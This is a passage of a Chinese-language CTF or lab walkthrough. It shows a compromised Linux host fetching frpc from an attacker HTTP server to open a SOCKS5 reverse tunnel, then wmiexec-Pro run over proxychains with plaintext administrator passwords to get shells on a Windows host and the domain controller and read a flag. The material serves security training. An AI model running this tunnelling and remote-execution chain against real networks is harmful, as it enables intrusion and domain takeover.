[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
C:\Windows\system32>ipconfig /all ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : win7 Primary Dns Suffix . . . . . . . : test.org Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : test.org Ethernet adapter Bluetooth Network Connection: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network) Physical Address. . . . . . . . . : 7C-B5-66-A5-F0-A9 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-0C-29-A7-B1-B0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::c9d2:8e33:97e1:e872%11(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DHCPv6 IAID . . . . . . . . . . . : 234884137 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B DNS Servers . . . . . . . . . . . : 192.168.93.10 NetBIOS over Tcpip. . . . . . . . : Enabled Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft ISATAP Adapter Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes Tunnel adapter isatap.{9629380D-4A5C-4D07-A7A0-B7A03D8A48F0}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2 Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes
kali: ┌──(root㉿kali)-[~/tools/frp] └─# python3 -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ... 192.168.0.101 - - [02/Feb/2024 08:54:23] "GET /frpc HTTP/1.0" 200 - 192.168.0.101 - - [02/Feb/2024 08:54:27] "GET /frpc.ini HTTP/1.0" 200 - ^C Keyboard interrupt received, exiting. ┌──(root㉿kali)-[~/tools/frp] └─# ./frps -c ./frps.ini 2024/02/02 08:55:29 [I] [root.go:200] frps uses config file: ./frps.ini 2024/02/02 08:55:29 [I] [service.go:194] frps tcp listen on 0.0.0.0:7000 2024/02/02 08:55:29 [I] [root.go:209] frps started successfully 2024/02/02 08:55:34 [I] [service.go:450] [7c5d43a8e8c3cd43] client login info: ip [192.168.0.101:50653] version [0.42.0] hostname [] os [linux] arch [amd64] 2024/02/02 08:55:34 [I] [tcp.go:64] [7c5d43a8e8c3cd43] [socks_proxy] tcp proxy listen port [8989] 2024/02/02 08:55:34 [I] [control.go:465] [7c5d43a8e8c3cd43] new proxy [socks_proxy] success
靶机: [firefart@192 ~]# wget http://192.168.0.115:8888/frpc --2019-10-07 01:24:28-- http://192.168.0.115:8888/frpc 正在连接 192.168.0.115:8888... 已连接。 已发出 HTTP 请求,正在等待回应... 200 OK 长度:10936320 (10M) [application/octet-stream] 正在保存至: “frpc” 100%[==========================================================================================================================================>] 10,936,320 25.9M/s in 0.4s 2019-10-07 01:24:29 (25.9 MB/s) - 已保存 “frpc” [10936320/10936320]) [firefart@192 ~]# wget http://192.168.0.115:8888/frpc.ini --2019-10-07 01:24:32-- http://192.168.0.115:8888/frpc.ini 正在连接 192.168.0.115:8888... 已连接。 已发出 HTTP 请求,正在等待回应... 200 OK 长度:117 [application/octet-stream] 正在保存至: “frpc.ini” 100%[==========================================================================================================================================>] 117 --.-K/s in 0s 2019-10-07 01:24:32 (1.99 MB/s) - 已保存 “frpc.ini” [117/117]) [firefart@192 ~]# ls anaconda-ks.cfg frpc frpc.ini install.log install.log.syslog nginx-1.9.4 nginx-1.9.4.tar.gz shell.elf [firefart@192 ~]# cat frpc.ini [common] server_addr = 192.168.0.115 server_port = 7000 [socks_proxy] type = tcp remote_port = 8989 plugin = socks5 [firefart@192 ~]# chmod +x frpc [firefart@192 ~]# ls anaconda-ks.cfg frpc frpc.ini install.log install.log.syslog nginx-1.9.4 nginx-1.9.4.tar.gz shell.elf [firefart@192 ~]# ./frpc -c frpc.ini & [2] 11201 [firefart@192 ~]# 2019/10/07 01:25:39 [I] [service.go:349] [7c5d43a8e8c3cd43] login to server success, get run id [7c5d43a8e8c3cd43], server udp port [0] 2019/10/07 01:25:39 [I] [proxy_manager.go:144] [7c5d43a8e8c3cd43] proxy added: [socks_proxy] 2019/10/07 01:25:39 [I] [control.go:181] [7c5d43a8e8c3cd43] [socks_proxy] start proxy success
kali上proxychains4.conf中最后一行要写:socks5 127.0.0.1 8989
wmiexec-Pro.py 是一个Python脚本,它使用WMI(Windows Management Instrumentation)来执行远程命令。WMI是Windows操作系统中的一种管理基础设施,攻击者可以利用它来执行各种管理任务,从而实现对目标系统的控制。
git clone https://github.com/XiaoliChan/wmiexec-Pro.git
┌──(root㉿kali)-[~/kali/CVE/impacket/wmiexec-Pro-main] └─# proxychains4 python3 wmiexec-pro.py 'administrator:123qwe!ASD@192.168.93.30' exec-command -shell [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra [proxychains] Strict chain ... 127.0.0.1:8989 ... 192.168.93.30:135 ... OK [proxychains] Strict chain ... 127.0.0.1:8989 ... 192.168.93.30:49154 ... OK [+] Class: Win32_OSRecoveryConfigurationDataBackup has been created! [!] Launching semi-interactive shell - Careful what you execute C:\Windows\System32>nltest /DCLIST:124-hack [+] Waiting 1s for next step. [+] Results: Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN The command completed successfully C:\Windows\system32>netdom query pdc [+] Waiting 1s for next step. [+] Results: 'netdom' is not recognized as an internal or external command, operable program or batch file. C:\Windows\system32>nslookup -type=SRV _ldap._tcp (**查看域控制器的主机名**) [+] Waiting 1s for next step. [+] Results: DNS request timed out. timeout was 2 seconds. Server: UnKnown Address: 192.168.93.10 _ldap._tcp.test.org SRV service location: priority = 0 weight = 100 port = 389 svr hostname = win-8ga56tnv3mv.test.org win-8ga56tnv3mv.test.org internet address = 192.168.93.10
┌──(root㉿kali)-[~/kali/CVE/impacket/wmiexec-Pro-main]
└─# proxychains4 python3 wmiexec-pro.py 'administrator:zxcASDqw123!!@192.168.93.10' exec-command -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:8989 ... 192.168.93.10:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:8989 ... 192.168.93.10:49154 ... OK
[+] Class: Win32_OSRecoveryConfigurationDataBackup has been created!
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\System32>
flag在C:\Users\Administrator\Documents
C:\Windows\system32>cd C:/ [+] Waiting 1s for next step. [+] Results: C:\>dir [+] Waiting 1s for next step. [+] Results: Volume in drive C has no label. Volume Serial Number is D6DC-065A Directory of C:\ 08/22/2013 11:52 PM <DIR> PerfLogs 10/28/2019 08:44 PM <DIR> Program Files 08/22/2013 11:39 PM <DIR> Program Files (x86) 10/06/2019 07:14 PM <DIR> Users 10/30/2019 10:31 PM <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 50,226,286,592 bytes free C:\>cd user [+] Waiting 1s for next step. [+] Results: The system cannot find the path specified. C:\>cd Users [+] Waiting 1s for next step. [+] Results: C:\Users>dir [+] Waiting 1s for next step. [+] Results: Volume in drive C has no label. Volume Serial Number is D6DC-065A Directory of C:\Users 10/06/2019 07:14 PM <DIR> . 10/06/2019 07:14 PM <DIR> .. 10/06/2019 07:14 PM <DIR> Administrator 08/22/2013 11:39 PM <DIR> Public 0 File(s) 0 bytes 4 Dir(s) 50,226,266,112 bytes free C:\Users>cat Administrator[proxychains] Strict chain ... 127.0.0.1:8989 ... 192.168.93.10:135 ... OK [+] Waiting 1s for next step. [+] Results: 'cat' is not recognized as an internal or external command, operable program or batch file. C:\Users>type Administrator [+] Waiting 1s for next step. [+] Results: Access is denied. C:\Users>cd Administrator [+] Waiting 1s for next step. [+] Results: C:\Users\Administrator>dir [+] Waiting 1s for next step. [+] Results: Volume in drive C has no label. Volume Serial Number is D6DC-065A Directory of C:\Users\Administrator 10/06/2019 07:14 PM <DIR> . 10/06/2019 07:14 PM <DIR> .. 10/30/2019 10:12 PM <DIR> Contacts 10/31/2019 12:52 AM <DIR> Desktop 10/31/2019 12:52 AM <DIR> Documents 10/30/2019 10:12 PM <DIR> Downloads 10/30/2019 10:12 PM <DIR> Favorites 10/30/2019 10:12 PM <DIR> Links 10/30/2019 10:12 PM <DIR> Music 10/30/2019 10:12 PM <DIR> Pictures 10/30/2019 10:12 PM <DIR> Saved Games 10/30/2019 10:12 PM <DIR> Searches 10/30/2019 10:12 PM <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 50,225,737,728 bytes free C:\Users\Administrator\Desktop>cd ../Documents [+] Waiting 1s for next step. [+] Results: C:\Users\Administrator\Documents>dir [+] Waiting 1s for next step. [+] Results: Volume in drive C has no label. Volume Serial Number is D6DC-065A Directory of C:\Users\Administrator\Documents 10/31/2019 12:52 AM <DIR> . 10/31/2019 12:52 AM <DIR> .. 10/31/2019 12:53 AM 13 flag.txt 1 File(s) 13 bytes 2 Dir(s) 50,225,737,728 bytes free C:\Users\Administrator\Documents>type flag.txt [proxychains] Strict chain ... 127.0.0.1:8989 ... 192.168.93.10:135 ... OK [+] Waiting 1s for next step. [+] Results: this is flag!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。